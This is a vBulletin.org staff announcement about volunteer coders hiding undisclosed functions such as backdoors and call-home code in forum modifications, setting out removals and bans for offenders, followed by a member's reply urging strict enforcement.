Most of our members are using vBulletin to provide a Forum on their website(s). What are the reasons people have chosen vBulletin over other similar solutions? There can be many answers to this, but I think there is one that will be on everyone’s list: Trust.
You have bought software from a company that you trust, you are confident that they will provide you with quality software, with no known security issues. If a security issue is found, you’re confident that it will be addressed as soon as possible. Knowing this you can concentrate on your community, instead of being worried about security issues.
As your community grows you will find that you have needs for non-standard functionality, or just extra’s that will put your community ahead of your competition. Now here vBulletin.org comes in the picture.
Where the vBulletin software itself is created, maintained and supported by ‘professionals’, the vBulletin.org community relies solely on volunteer coders. This gives enthusiast coders to opportunity to contribute to the community and enhance the vBulletin product, making the life of running your own community easier.
Where the coders on vBulletin.org might give you professional solutions, they are in some level anonymous, it is not a company that has much to loose in case of a broken trust relationship. They will offer you software solutions, often free of charge, for your Board that you might install without ever seeing (all) of the code that is getting installed on your server. This is even more true with vBulletin 3.5 where most modification are done by simply installing a product file, instead of manually doing code changes.
Now where is this post going? You install probably numerous modifications on your board, provided by different coders. By installing software, you give total control of your board in the hands of these ‘anonymous’ coders. This requires a high level of trust towards them.
Where common sense, reading other users responses and testing on a Test Board can prevent you from disasters caused by coding errors (hey we are all human) or differences in the environment, there is another vulnerability that you can not so easy protect yourself against: Hidden functionality in the installed modification.
Hidden functions that are not documented and/or disclosed by the author can lead to a lot of things, I will try to sum up a few that are possible, some ‘innocent’, some with possible severe consequences. Some possible examples:
- A backdoor into your AdminCP
- Mailing admin passwords to the authors account.
- Call-home functions
- Usage tracking
- Disruption of service or data
- Any other technique that is used in Spyware/Malware type of software.
The stand of vBulletin.org Staff is that our members should be able to completely trust the solutions offered here as much as possible. This means that we will not tolerate any form of hidden functionality, since that is the only way we can keep the trust of the members using these solutions.
The reason for this thread is that, to our own shame, we received recently reports that there are coders who do incorporate hidden functionalities in their modifications. Lucky the type of hidden functions could be considered as relative harmless, but we will nevertheless not tolerate this. I would like to emphasize that this did not sent any security or privacy related information, nor did it in anyway brake the security of your site.
The discovered hidden functionality where aimed at a backdoor in the services of vBulletin.org itself, and have by now been closed. The effect of this functionality will be corrected by us soon. There has been no negative effects on the boards that are using any of these modifications.
From the time of this post on we will take the following actions upon discovery of such modifications:
- All users who have clicked Install for this modification will be notified about the issue.
- The offending modification will be withdrawn immediate.
- Depending on the severity, all modifications submitted by this author could be withdrawn immediate, and the user account of the author could be closed.
- Admin will contact the author by mail to inform him and hear his/her side of the story.
The vBulletin.org team wants to apologize for any breach of trust this has caused. We hope that our members will be confident that we are addressing these issues seriously and as good as we can and that you can continue to have a trust relation with the authors that offer solutions here at vBulletin.org.
vBulletin.org Team
I totally support the decisions to immediately remove all offending modifications, all modifications from the offending authors, and to ban the offending authors.
IMO, there is no reason why anyone should be doing anything untowards with their modifications. There are no excuses. Most coders release their code according to the guidlines, but yet again it is a select few who spoil it for the rest of us.
When one coder does something untowards, it reflects badly on every single coder here at vB.org. Yes, we could all include additional code to our modifications, but that would then make the problem even worse. As it stands, the problem is bad enough to warrant this announcement and proposed action.
For those who have installed modifications, be in on their test boards or live boards, I strongly encourage you to be proactive and to take notice of the code of your modifications. I understand that the majority do not know how to read php code, I am a relative newbie to php too and so find this difficult. Still have a look at it if you can, most files open in an internet explorer window for review. You might be surprized at what you learn.
Again, to emphasise my stance on this:
All offending coders MUST be banned;
All offending modifications MUST be removed immediately;
All modification from offending coders, regardless of vB version, MUST be removed;
There must be no exceptions to this. There are no excuses.
This does sound harsh, I will admit, but there are the long term implications of this on the rest of the coding community, and the trust factor for the members to be considered.
No action means nothing. Strong and severe action must be taken